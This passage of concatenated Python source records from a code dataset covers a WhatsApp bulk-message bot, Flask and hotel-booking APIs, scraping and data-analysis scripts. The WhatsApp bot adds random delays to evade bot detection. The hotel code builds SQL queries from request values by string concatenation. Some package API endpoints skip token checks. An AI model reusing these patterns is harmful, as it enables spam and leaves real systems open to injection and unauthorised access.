']'\n try:\n group_title = wait.until(\n EC.presence_of_element_located((By.XPATH, name_x_arg)))\n group_title.click()\n except:\n print(target + \" is not on WhatsApp\")\n error_file.write(target[1:-1] + \"\\n\")\n search_button.click()\n return\n\n try:\n browser.find_element_by_xpath(\n \"//*[contains(text(),'t send a message to blocked contact')]\")\n search_button.click()\n error_file.write(target[1:-1] + \"\\n\")\n print(target + \" is blocked\")\n return\n except:\n pass\n\n try:\n # this XPath matches the Indonesian-locale WhatsApp UI text, so it must stay untranslated\n browser.find_element_by_xpath(\n \"//*[contains(text(),'Tidak dapat mengirim pesan ke kontak terblokir')]\")\n search_button.click()\n error_file.write(target[1:-1] + \"\\n\")\n print(target + \" is blocked\")\n return\n except:\n pass\n\n input_box = browser.find_element_by_xpath(\n '//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\n\n ActionChains(browser).key_down(Keys.CONTROL).key_down('v').key_up(Keys.CONTROL).key_up(\n 'v').key_up(Keys.BACKSPACE).perform()\n\n input_box.send_keys(Keys.ENTER)\n print(\"Message sent successfully to \" + target)\n\n if (isAttach == \"yes\"):\n try:\n send_attachment(image_path)\n except:\n print('Attachment not sent.')\n\n except:\n return\n\n\ndef send_attachment(path):\n # Attachment Drop Down Menu\n try:\n clipButton = browser.find_element_by_xpath(\n '//*[@id=\"main\"]/footer/div[1]/div[1]/div[2]/div/div/span')\n clipButton.click()\n except:\n pass\n\n # Clicking the Media button\n try:\n mediaButton = wait.until(\n EC.presence_of_element_located((By.XPATH, '//*[@id=\"main\"]/footer/div[1]/div[1]/div[2]/div/span/div/div/ul/li[1]/button')))\n mediaButton.click()\n except:\n pass\n time.sleep(2)\n\n # Sending paths to pop-up windows\n autoit.send(path)\n autoit.send(\"{ENTER}\")\n\n # Clicking the send button\n try:\n x_arg_imgsend = '//*[@id=\"app\"]/div/div/div[2]/div[2]/span/div/span/div/div/div[2]/span/div/div'\n whatsapp_send_button = wait.until(\n EC.presence_of_element_located((By.XPATH, x_arg_imgsend)))\n whatsapp_send_button.click()\n except:\n traceback.print_exc()\n\n\ndef sender(contact, isAttach, image_path):\n global error_file\n\n # Seed to create random number to evade Whatsapp Bot detection\n seed(1)\n\n # Initiating error file\n error_file = open('contact_error.txt', 'w')\n error_file.write(\n 
\"Here are some contacts that give errors in this session\\n\")\n error_file.close()\n error_file = open('contact_error.txt', 'a', buffering=1)\n\n # Iterating through contacts list\n for target in contact:\n try:\n send_message(target, image_path)\n except:\n pass\n time.sleep(1 + random()*10/5)\n\n error_file.close()\n\n\nif __name__ == \"__main__\":\n # Initiating contacts, attachment, and message\n list_of_contact = import_contacts()\n isAttach, image_path = attachment_verification()\n import_message()\n\n # Login and Scan\n whatsapp_login()\n\n # Sending the messages\n sender(list_of_contact, isAttach, image_path)\n\n print(\"Done!\\nContacts without WhatsApp were saved to 'contact_error.txt'\")\n","sub_path":"WA_bot.py","file_name":"WA_bot.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"96446758","text":"from flask import request, Blueprint, jsonify\nfrom evodoc import DbException, ApiException\nfrom evodoc.entity import Package\nfrom evodoc.api import response_ok, response_ok_obj, response_ok_list, validate_token, validate_data\n\npackage = Blueprint('package', __name__, url_prefix='/package')\n\n@package.route('', methods=['GET'])\ndef get_package_by_id_action():\n    \"\"\"\n    Get package by id\n    \"\"\"\n    token = request.args.get('token')\n    validate_token(token)\n    package_id = request.args.get('package_id')\n    data = Package.get_package_by_id(package_id)\n    return response_ok_obj(data)\n\n@package.route('/all', methods=['GET'])\ndef get_all_packages():\n    \"\"\"\n    Return all packages\n    \"\"\"\n    token = request.args.get('token')\n    validate_token(token)\n    return response_ok_list(Package.get_all_packages())\n\n@package.route('', methods=['POST'])\ndef save_package():\n    \"\"\"\n    Saves package (create or update)\n    \"\"\"\n    data = request.get_json()\n    validate_data(data, {'token'})\n    validate_token(data['token'])\n    package = Package.save_or_create(data)\n    return response_ok_obj(package)\n\n@package.route('/down', methods=['POST'])\ndef download_package():\n    \"\"\"\n    Tries to retrieve package from git\n    \"\"\"\n    data = request.get_json()\n    validate_data(data, {'token', 'package_id'})\n    package = Package.get_package_by_id(data['package_id'])\n    package.download_package()\n    return response_ok({'data': 'Done'})\n\n@package.route('', methods=['DELETE'])\ndef delete_package():\n    \"\"\"\n    Deletes package\n    \"\"\"\n    data = request.get_json()\n    validate_data(data, {'token', 'package_id'})\n    package = Package.get_package_by_id(data['package_id'])\n    package.delete_package()\n    data = {\n        \"data\": \"done\"\n    }\n    return response_ok(data)\n\n@package.errorhandler(ApiException)\n@package.errorhandler(DbException)\ndef __response_err(data):\n    return jsonify(data.message), data.errorCode\n","sub_path":"evodoc/api/packageapi.py","file_name":"packageapi.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"63181406","text":"from flask import *\r\nfrom flask_wtf import FlaskForm #base class\r\nfrom whoosh import analysis\r\nfrom flask import session\r\n\r\n\r\ndenoise_app = Blueprint(\"denoise\",__name__,url_prefix=\"/denoise/\")\r\n@denoise_app.route('/',methods=['GET','POST'])\r\ndef denoise():\r\n img_list = []\r\n Annotation = []\r\n No = 0\r\n cnt = 0\r\n annotation = {}\r\n with open('../annotation_prepare/annotation_new.txt','r') as f:\r\n for line in f:\r\n line = line.split('\\t')\r\n img_name = 
line[0].split('/')[-1]\r\n anno = line[2]\r\n annotation[img_name] = anno\r\n annotation_sort = sorted(annotation.items(),key=lambda y: y[0])\r\n for k in annotation_sort[380:600]:\r\n img_list.append([k[0]])\r\n Annotation.append(k[1])\r\n print('length: ',len(img_list))\r\n # if 'img_anno' not in session:\r\n # session['img_anno'] = []\r\n # with open('../annotation_prepare/Cluster.txt','r') as f:\r\n # for line in f:\r\n # # if len(session['img_anno'])<5000:\r\n # # session['img_anno'].append([' ',' ',' '])\r\n # # continue\r\n # line0 = line.strip()\r\n # line = line.strip().split('\\t')\r\n # if len(line)>2:\r\n # session['img_anno'].append([line[1],line[2],line0])\r\n # else:\r\n # session['img_anno'].append([line[1],' ',line0])\r\n # if request.method == 'POST':\r\n # No = int(request.form.get('No'))\r\n # for k in range(min(10,len(session['img_anno'])-No)):\r\n # flag = 1\r\n # feedback = [0,0]\r\n # if request.form.get('accurate'+str(k)):\r\n # feedback[0] = 1\r\n # if request.form.get('noise'+str(k)):\r\n # feedback[1] = 1\r\n # flag = 0\r\n # if flag == 1:\r\n # line = session['img_anno'][No+k][2]\r\n # line += '\\t' + str(feedback[0])+'\\t'+str(feedback[1])+'\\n'\r\n # with open('annotation.txt','a+') as f:\r\n # f.write(line)\r\n # No += 10\r\n # if No>=len(session['img_anno'])-1:\r\n # No = 0\r\n # img_list = []\r\n # Annotation = []\r\n # for k in range(min(10,len(session['img_anno'])-No)):\r\n # img_list += [session['img_anno'][No+k][0].split(',')]\r\n # Annotation += [session['img_anno'][No+k][1]]\r\n # else:\r\n # No = 6030\r\n # img_list = []\r\n # Annotation = []\r\n # for k in range(10):\r\n # img_list += [session['img_anno'][No+k][0].split(',')]\r\n # Annotation += [session['img_anno'][No+k][1]]\r\n return render_template('DenoisePage.html',content={'img_list':img_list,'Annotation':Annotation,'No':No})","sub_path":"blueprints/DenoisePage.py","file_name":"DenoisePage.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"140349009","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 19 10:08:29 2018\n\n@author: Patrick\n\"\"\"\nimport matplotlib.pyplot as plt\n\nimport pandas as pd\n\nfrom sklearn import linear_model\nfrom sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.feature_selection import VarianceThreshold, SelectKBest, chi2, f_regression, mutual_info_regression\n\n\n# data set from jay divided into two files, and august 2017 removed\nattributes = \"2018_Attributes.csv\"\nattributes_df = pd.read_csv(attributes)\ntargets = \"2018_Targets.csv\"\n#targets dataframe contains all groups including Food 17\ntargets_df = pd.read_csv(targets)\n\n#can't get this to work right (trying to remove history before 1999)\n#targets_df = targets_df[int(targets_df.Timestamp) >= 36161]\n#attributes_df = attributes_df[int(attributes_df.Timestamp) >= 36161]\n\n#targets_df = targets_df[171:]\n#attributes_df = attributes_df[171:]\n\n#print(\"Attributes DataFrame:\")\n#print(str(attributes_df.info()))\n#print(attributes_df.head())\n\n#print(\"Targets DataFrame:\")\n#print(str(targets_df.info()))\n\n#print(\"Food 17 Dataframe:\")\n#print(str(CPI_df.info()))\n\n\n\ntimestamps_df = attributes_df['Timestamp']\nfood17_target_df = targets_df['Food 17']\n\n# remove the timestamps from both\ntargets_df = targets_df.drop('Timestamp', axis = 1)\nattributes_df = attributes_df.drop('Timestamp', axis = 1)\n\n\n# drop all attributes that are missing values for now\n# revise this later when we predict them.\nattributes_df = attributes_df.dropna(how='any', axis = 1)
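\n\n# --- Added: hedged refactor sketch (illustrative; defined but never called) ---\n# The per-year blocks below repeat one fit/predict/report pattern; a helper like\n# this would express it once. The name and argument layout are assumptions.\ndef _backtest_window(att, tgt, train_end, test_start, test_end, label):\n    regr = linear_model.LinearRegression()  # fresh model per window\n    regr.fit(att[:train_end], tgt[:train_end])  # train only on earlier rows\n    pred = regr.predict(att[test_start:test_end])\n    print(label)\n    print(\"Mean squared error: %.2f\" % mean_squared_error(tgt[test_start:test_end], pred))\n    print('Variance score: %.2f' % r2_score(tgt[test_start:test_end], pred))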
\n\n#feature selection by variance\n#sel = VarianceThreshold(threshold=(.8 * (1 - .8)))\n#attributes_df = sel.fit_transform(attributes_df)\n\natt_df = attributes_df\n\nMSE = []\n\nfor x in range(3, 15):\n \n attributes_df = SelectKBest(mutual_info_regression,k= x).fit_transform(att_df,food17_target_df)\n \n print(\"K = \",x)\n #print(attributes_df.info())\n #print(attributes_df.head())\n #print(attributes_df.head())\n \n # how many months to take off the timeframe (negative offsets);\n # used for predicting each year based on the years before.\n # currently doesn't line up with calendar years since the last record is July 2017\n fiveyear = -60 #months\n fouryear = -48\n threeyear = -36\n twoyear = -24\n oneyear = -12\n sixmonth = -6\n \n #one year divide into testing and training \n #attributes\n att_train_oneyear_df = attributes_df[:oneyear]\n att_test_oneyear_df = attributes_df[oneyear:]\n #target groupings\n tar_train_oneyear__df = targets_df[:oneyear]\n tar_test_oneyear_df = targets_df[oneyear:]\n # food 17 alone\n food17_train_oneyear_df = food17_target_df[:oneyear]\n food17_test_oneyear_df = food17_target_df[oneyear:]\n \n #last six months\n #attributes\n att_train_sixmonth_df = attributes_df[:sixmonth]\n att_test_sixmonth_df = attributes_df[sixmonth:]\n #target groupings\n tar_train_sixmonth__df = targets_df[:sixmonth]\n tar_test_sixmonth_df = targets_df[sixmonth:]\n # food 17 alone\n food17_train_sixmonth_df = food17_target_df[:sixmonth]\n food17_test_sixmonth_df = food17_target_df[sixmonth:]\n \n #2 years ago\n #attributes\n att_train_twoyear_df = attributes_df[:twoyear]\n att_test_twoyear_df = attributes_df[twoyear:oneyear]\n #target groupings\n tar_train_twoyear__df = targets_df[:twoyear]\n tar_test_twoyear_df = targets_df[twoyear:oneyear]\n # food 17 alone\n food17_train_twoyear_df = food17_target_df[:twoyear]\n food17_test_twoyear_df = food17_target_df[twoyear:oneyear]\n \n #3 years ago\n #attributes\n att_train_threeyear_df = attributes_df[:threeyear]\n att_test_threeyear_df = attributes_df[threeyear:twoyear]\n #target groupings\n tar_train_threeyear__df = targets_df[:threeyear]\n tar_test_threeyear_df = targets_df[threeyear:twoyear]\n # food 17 alone\n food17_train_threeyear_df = food17_target_df[:threeyear]\n food17_test_threeyear_df = food17_target_df[threeyear:twoyear]\n \n #4 years ago\n #attributes\n att_train_fouryear_df = attributes_df[:fouryear]\n att_test_fouryear_df = attributes_df[fouryear:threeyear]\n #target groupings\n tar_train_fouryear__df = targets_df[:fouryear]\n tar_test_fouryear_df = targets_df[fouryear:threeyear]\n # food 17 alone\n food17_train_fouryear_df = food17_target_df[:fouryear]\n food17_test_fouryear_df = food17_target_df[fouryear:threeyear]\n \n #5 years ago\n #attributes\n att_train_fiveyear_df = attributes_df[:fiveyear]\n att_test_fiveyear_df = attributes_df[fiveyear:fouryear]\n #target groupings\n tar_train_fiveyear__df = targets_df[:fiveyear]\n tar_test_fiveyear_df = targets_df[fiveyear:fouryear]\n # food 17 alone\n food17_train_fiveyear_df = food17_target_df[:fiveyear]\n food17_test_fiveyear_df = food17_target_df[fiveyear:fouryear]\n \n \n #LAST 12 MONTHS!\n #code below modified version of:\n #http://scikit-learn.org/stable/auto_examples/linear_model/plot_ols.html\n # Create linear regression object for one year\n regr_oneyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_oneyear.fit(att_train_oneyear_df, food17_train_oneyear_df)\n # Make predictions using the 
testing set\n food17_pred_oneyear = regr_oneyear.predict(att_test_oneyear_df)\n # The coefficients\n print(\"2016-08-01 to 2017-07-01\")\n print('Coefficients: \\n', regr_oneyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_oneyear_df, food17_pred_oneyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_oneyear_df, food17_pred_oneyear))\n \n \n #TWO YEARS BACK 12 MONTHS!\n regr_twoyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_twoyear.fit(att_train_twoyear_df, food17_train_twoyear_df)\n # Make predictions using the testing set\n food17_pred_twoyear = regr_twoyear.predict(att_test_twoyear_df)\n # The coefficients\n print(\"2015-08-01 to 2016-07-01\")\n print('Coefficients: \\n', regr_twoyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_twoyear_df, food17_pred_twoyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_twoyear_df, food17_pred_twoyear))\n \n \n #THREE YEARS BACK 12 MONTHS!\n regr_threeyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_threeyear.fit(att_train_threeyear_df, food17_train_threeyear_df)\n # Make predictions using the testing set\n food17_pred_threeyear = regr_threeyear.predict(att_test_threeyear_df)\n # The coefficients\n print(\"2014-08-01 to 2015-07-01\")\n print('Coefficients: \\n', regr_threeyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_threeyear_df, food17_pred_threeyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_threeyear_df, food17_pred_threeyear))\n \n \n \n #FOUR YEARS BACK 12 MONTHS!\n regr_fouryear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_fouryear.fit(att_train_fouryear_df, food17_train_fouryear_df)\n # Make predictions using the testing set\n food17_pred_fouryear = regr_fouryear.predict(att_test_fouryear_df)\n # The coefficients\n print(\"2013-08-01 to 2014-07-01\")\n print('Coefficients: \\n', regr_fouryear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_fouryear_df, food17_pred_fouryear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_fouryear_df, food17_pred_fouryear))\n \n \n #FIVE YEARS BACK 12 MONTHS!\n regr_fiveyear = linear_model.LinearRegression()\n # Train the model using the training sets\n regr_fiveyear.fit(att_train_fiveyear_df, food17_train_fiveyear_df)\n # Make predictions using the testing set\n food17_pred_fiveyear = regr_fiveyear.predict(att_test_fiveyear_df)\n # The coefficients\n print(\"2012-08-01 to 2013-07-01\")\n print('Coefficients: \\n', regr_fiveyear.coef_)\n # The mean squared error\n print(\"Mean squared error: %.2f\"\n % mean_squared_error(food17_test_fiveyear_df, food17_pred_fiveyear))\n # Explained variance score: 1 is perfect prediction\n print('Variance score: %.2f' % r2_score(food17_test_fiveyear_df, food17_pred_fiveyear))\n\n\n\n\n\n","sub_path":"Codebase_2018/walter/code/processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":8540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"188078498","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Tue Jul 17 17:29:43 2018\r\n\r\n@author: yang\r\n\"\"\"\r\n\r\nimport os\r\nimport pypinyin\r\nfrom pypinyin import pinyin\r\n\r\n \r\ndef main(path):\r\n    filelist = os.listdir(path)\r\n    for files in filelist:\r\n        Olddir = os.path.join(path, files)\r\n        if os.path.isdir(Olddir):\r\n            \r\n            continue\r\n        filename = os.path.splitext(files)[0]\r\n        filename1 = pinyin(filename, style=pypinyin.FIRST_LETTER)\r\n        filename2 = []\r\n        for i in filename1:\r\n            # pinyin() returns a list of single-element lists; keep only the\r\n            # chunks longer than one character (non-Chinese text passes through whole)\r\n            length = len(i[0])\r\n            if length > 1:\r\n                filename2.extend(i)\r\n        filenameToStr = ''.join(filename2)\r\n        filetype = os.path.splitext(files)[1]\r\n        Newdir = os.path.join(path, filenameToStr + filetype)\r\n        os.rename(Olddir, Newdir)\r\nprint(\"--enter the file_path--\")\r\ni = input()\r\nmain(i)\r\nprint(\"Processing completed\")\r\nos.system(\"pause\")","sub_path":"rename.py","file_name":"rename.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"492340799","text":"from selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport time\nfrom utils import xpath\nfrom dateutil.parser import parse\n\ndef get_likers(driver2):\n    time.sleep(3)\n    driver2.find_element(By.XPATH, xpath['likers_button']).click()\n    likers_body = WebDriverWait(driver2, 10).until(EC.presence_of_element_located((By.XPATH, xpath['likers_div'])))\n    time.sleep(3)\n    likers = []\n    previous_len = -1\n    while len(likers) > previous_len:\n        previous_len = len(likers)\n        elements = likers_body.find_elements(By.TAG_NAME, 'a')\n        for el in elements:\n            if el.get_attribute('title') and el.get_attribute('title') not in likers:\n                likers.append(el.get_attribute('title'))\n        driver2.execute_script(\"arguments[0].scrollTop = arguments[0].scrollHeight\", likers_body)\n        time.sleep(1)\n    return likers\n\ndef get_post_info(post_link, driver2):\n    driver2.get(post_link)\n    date = WebDriverWait(driver2, 10).until(EC.presence_of_element_located((By.XPATH, xpath['post_date']))).get_attribute('datetime')\n    date = parse(date)\n    # placeholder kept when the likers list cannot be scraped (e.g. video posts)\n    likers = ['This is a video']\n    try:\n        likers = get_likers(driver2)\n    except Exception:\n        pass\n    return likers, date","sub_path":"insta_bot/post_info.py","file_name":"post_info.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"68878867","text":"from kitchen import kitchenState, annotatedRecipe\nfrom esdcs.groundings import PhysicalObject\n\n#19\n#http://www.food.com/recipe/impossible-peanut-butter-cookies-15411\n#\n#1 cup peanut butter (your choice, smooth or chunky)\n#1 cup granulated sugar\n#1 large egg\n#\n#1 Mix peanut butter, sugar, and egg together until smooth.\n#2 Drop by teaspoon onto cookie sheet two inches apart. 
\n#3 Press with fork; press again in opposite direction\n#4 Bake 10 to 12 minutes at 350 degrees Fahrenheit.\n#5 Do not brown; do not over bake.\n\nrecipeName = \"Impossible Peanut Butter Cookies\"\nrecipeSource = \"http://www.food.com/recipe/impossible-peanut-butter-cookies-15411\"\n\n#replace None with Physical Objects\ningredientsList = [(\"1 cup peanut butter (your choice, smooth or chunky)\", kitchenState.Ingredient(contains=[\"peanut_butter\"], homogenous=True, amount=\"1 cup peanut butter\",\n                    physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 1, 1, 2), lcmId=1, tags=['peanutbutter']))),\n                   (\"1 cup granulated sugar\", kitchenState.Ingredient(contains=[\"sugar\"], homogenous=True, amount=\"1 cup\",\n                    physicalObject=PhysicalObject(kitchenState.prism_from_point(5, 1, 1, 2), lcmId=2, tags=['sugar']))),\n                   (\"1 large egg\", kitchenState.Ingredient(contains=[\"eggs\"], homogenous=True, amount=\"1\",\n                    physicalObject=PhysicalObject(kitchenState.prism_from_point(3, 3, 1, 2), lcmId=3, tags=['eggs'])))]\n\ninstructionsList = [(\"1 Mix peanut butter, sugar, and eggs together until smooth.\", \"pour(peanut_butter), pour(sugar), pour(eggs), mix()\"),\n                    (\"2 Drop by teaspoon onto cookie sheet two inches apart.\", \"scrape()\"),\n                    (\"3 Press with fork; press again in opposite direction.\", \"noop()\"),\n                    (\"4 Bake 10 to 12 minutes at 350 degrees Fahrenheit\", \"preheat(350), bake(10)\"),\n                    (\"5 Do not brown; do not over bake.\", \"noop()\")]\n\nannotatedRecipeObject = annotatedRecipe.AnnotatedRecipe(recipeName, recipeSource, ingredientsList, instructionsList)\n\n","sub_path":"data/kitchen/data/impossiblePeanutButterCookiesRecipe.py","file_name":"impossiblePeanutButterCookiesRecipe.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"573873783","text":"import json\r\nimport random\r\nfrom sqlwrapper import gensql,dbget,dbput\r\nimport datetime\r\nfrom ApplicationDate import application_date\r\n\r\ndef HOTEL_BBL_POST_INSERT_BusinessBlock(request):\r\n    sql_value = json.loads(dbget(\"select count_id from business_block.count\"))\r\n    print(sql_value, type(sql_value))\r\n    \r\n    sql_value1 = sql_value[0]['count_id']\r\n    #sql = int(sql_value1)\r\n    print(sql_value1, type(sql_value1))\r\n\r\n    count = sql_value1 + 1\r\n    print(count)\r\n\r\n    psql = dbput(\"update business_block.count set count_id = '\"+str(sql_value[0]['count_id']+1)+\"'\")\r\n    print(psql)\r\n    d = request.json\r\n    E = d['Inquiry']\r\n    E = {k: v for k, v in E.items() if v != ''}\r\n    print(E)\r\n    E['block_id'] = count\r\n    random_no = random.randint(1000000000, 9999999999)\r\n    random_no = str(random_no)\r\n    random_no = random_no[0:4]\r\n    print(random_no)\r\n    pf_id = E.get(\"pf_id\")\r\n    PF_ACCOUNT = json.loads(dbget(\"select pf_account from profile.pf_company_profile where pf_id = '\"+pf_id+\"'\"))\r\n    PF_ACCOUNT = PF_ACCOUNT[0]['pf_account']\r\n    pf_account = PF_ACCOUNT[0:5]\r\n    E['block_status'] = \"Inquiry\"\r\n    E['block_code'] = random_no + pf_account\r\n    E['block_name'] = PF_ACCOUNT\r\n    sql = gensql('insert','business_block.business_block',E)\r\n    print(sql)\r\n    #inquiry grid\r\n    id11 = E.get(\"block_id\")\r\n    g = d['Inquiry_grid']\r\n    print(g, type(g))\r\n    \r\n\r\n    for i in g:\r\n        j = {k: v for k, v in i.items() if v != ''}\r\n        j['block_id'] = id11\r\n        \r\n        psql = gensql('insert','business_block.inquiry_grid',j)\r\n\r\n\r\n    s = {}\r\n    s['user_role'] = \"Supervisor\"\r\n    blockname = E.get(\"block_name\")\r\n    app_datetime = 
application_date()\r\n    #RES_Log_Time = datetime.datetime.utcnow()+datetime.timedelta(hours=5, minutes=30)\r\n    RES_Log_Time = app_datetime[0]\r\n    RES_Log_Date = app_datetime[1]\r\n    print(RES_Log_Date)\r\n    s['date'] = RES_Log_Date\r\n    s['time'] = RES_Log_Time\r\n    s['block_id'] = count\r\n    s['action_type_id'] = \"Business Block in inquiry status\"\r\n    s['description'] = \"Business Block in inquiry status for\"+\" \"+str(blockname)\r\n    gensql('insert','business_block.business_block_activity_log',s)\r\n    return(json.dumps({\"Return\": \"Record Inserted Successfully\",\"ReturnCode\": \"RIS\",\"Status\": \"Success\",\"StatusCode\": \"200\"},indent=4))\r\n\r\ndef HOTEL_BBL_POST_SELECT_QueryInquiryGrid(request):\r\n    d = request.json\r\n    sql = json.loads(gensql('select','business_block.inquiry_grid','*',d))\r\n    return(json.dumps({'Status': 'Success', 'StatusCode': '200','ReturnValue':sql ,'ReturnCode':'RRTS'},indent=4))\r\n    \r\n","sub_path":"HOTEL_BBL_POST_INSERT_BusinessBlock.py","file_name":"HOTEL_BBL_POST_INSERT_BusinessBlock.py","file_ext":"py","file_size_in_byte":2589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"38944644","text":"import logging\nimport random\nimport threading\nimport time\nfrom other_module.something import do_something\n\nlogger = logging.getLogger(__name__)\n\n\nclass ThreadFilter:\n    def __init__(self, id):\n        self.id = id\n\n    def filter(self, record):\n        return record.thread == self.id\n\n\ndef do_some_work(worker_id):\n    # setup logger\n    worker_log_filename = 'logging_test_worker_%d.log' % worker_id\n\n    worker_log_format = logging.Formatter('%(asctime)-15s %(levelname)-8s %(message)s')\n\n    worker_log_handler = logging.FileHandler(worker_log_filename)\n    worker_log_handler.setFormatter(worker_log_format)\n    worker_log_handler.setLevel(logging.INFO)\n    worker_log_handler.addFilter(ThreadFilter(threading.get_ident()))\n\n    logging.getLogger('').addHandler(worker_log_handler)\n\n    # do some work\n    logger.info('Hello from worker %d' % worker_id)\n    do_something(worker_id)\n    time.sleep(random.randint(1, 10))\n    logger.info('Goodbye from worker %d' % worker_id)\n\n    # the handler was attached to the root logger above, so it must be removed\n    # from the root logger as well (removing it from `logger` would be a no-op)\n    logging.getLogger('').removeHandler(worker_log_handler)\n","sub_path":"worker.py","file_name":"worker.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"398901373","text":"\"\"\"TheMovieDB models.\"\"\"\n\n\nclass Movie:\n    \"\"\"Basic movie model with information.\"\"\"\n\n    def __init__(self, data):\n        \"\"\"Initiate with json data from web service.\n\n        Args:\n            data (json): parsed json from native json library.\n        \"\"\"\n        self.adult = data['adult']\n        self.backdrop_path = data['backdrop_path']\n        self.genre_ids = data['genre_ids']\n        self.id = data['id']\n        self.original_language = data['original_language']\n        self.original_title = data['original_title']\n        self.overview = data['overview']\n        self.release_date = data['release_date']\n        self.poster_path = data['poster_path']\n        self.popularity = data['popularity']\n        self.title = data['title']\n        self.video = data['video']\n        self.vote_average = data['vote_average']\n        self.vote_count = data['vote_count']\n        self.media_type = data['media_type']\n","sub_path":"themoviedb/models/movie.py","file_name":"movie.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553317227","text":"import sys\nsys.path.append(\"D:/codes/stocks/infomationTools\") \nfrom 
parentObject import generalFunction\nfrom stock.dataSourceParse import constructDatabase\nfrom stock.dataSourceParse import updateDatabase\nfrom stock.dataSourceParse import getStockCodeList\n\n\nclass maintainDatabase(generalFunction):\n\t\"\"\"Builds and updates the per-stock financial-info tables in the SQLite database.\"\"\"\n\tdef __init__(self,indexFilePath = \"D:/programe-data/database/stockHistInfoDatabase/000827_index_components.txt\"\n\t\t, databasePath = \"D:/programe-data/database/stockHistInfoDatabase/stockFinanInfo.db\"\n\t\t,logFile = \"D:/programe-data/database/stockHistInfoDatabase/finanUpdate.log\"):\n\t\tself.iF = indexFilePath\n\t\tself.dp = databasePath\n\t\tself.log = logFile\n\n\tdef tableNameList(self,databasePath):\n\t\timport sqlite3\n\t\tconn = sqlite3.connect(databasePath)\n\t\tcursor = conn.cursor()\n\t\tcursor.execute(\"SELECT name FROM sqlite_master WHERE type='table';\")\n\t\ttableList = cursor.fetchall()\n\t\tcursor.close()\n\t\tconn.close()\n\t\ttableNameList = []\n\t\tfor item in tableList:\n\t\t\ttableNameList.append(item[0])\n\t\treturn(tableNameList)\n\tdef loadIndexComponent(self,filePath):\n\t\timport json\n\t\tindexDict = json.load(open(filePath))\n\t\t#indexDict {'date':[component],'date':[],...}\n\t\treturn(indexDict)\n\n\n\tdef maintainDbAll(self):\n\t\timport datetime\n\t\tlogHandle = open(self.log,'a')\n\t\tstockCodeList = getStockCodeList(self.dp).getListofStockCode()\n\t\tuniqueStockList1 = list(set(stockCodeList))\n\t\tstockTableList = self.tableNameList(self.dp)\n\t\t#print(stockTableList)\n\t\tprint(len(uniqueStockList1))\n\t\tlogHandle.write(str(datetime.datetime.today()) + \" \" + str(len(uniqueStockList1)) + \" stock codes\\n\")\n\t\tprint(sys.argv)\n\t\tif len(sys.argv) < 2:\n\t\t\t#self.updateMgsy(uniqueStockList1,stockTableList,logHandle)\n\t\t\tself.updateMgjzc(uniqueStockList1,stockTableList,logHandle)\n\t\t\t# self.updateSinaFh(uniqueStockList1,stockTableList,logHandle)\n\t\telse:\n\t\t\t# if 'fh' in sys.argv[1:]:\n\t\t\t# \tself.updateSinaFh(uniqueStockList1,stockTableList,logHandle)\n\t\t\tif 'mgsy' in sys.argv[1:]:\n\t\t\t\tself.updateMgsy(uniqueStockList1,stockTableList,logHandle)\n\t\t\tif \"mgjzc\" in sys.argv[1:]:\n\t\t\t\tself.updateMgjzc(uniqueStockList1,stockTableList,logHandle)\n\t\tlogHandle.close()\n\n\tdef updateMgsy(self,uniqueStockList,stl,logH):\n\t\tlogHandle = logH\n\t\tstockTableList = stl\n\t\tuniqueStockList1 = uniqueStockList\n\t\tfor item in uniqueStockList1:\n\t\t\t#print(\"doing \" + item)\n\t\t\tmgsyName = \"MeiGuShouYi_\" + item[0:6]\n\t\t\t#mgjzcName = \"MeiGuJingZiChan_\" + item[0:6]\n\t\t\t#fhName = \"MeiNianFenHong_\" + item[0:6]\n\t\t\tif mgsyName in stockTableList:\n\t\t\t\ttry:\n\t\t\t\t\tupdateDatabase(item[0:6],item[6:9],'N','N',self.dp).meiGuShouYiUpdate()\n\t\t\t\t\t#print('updated mgsy ' + 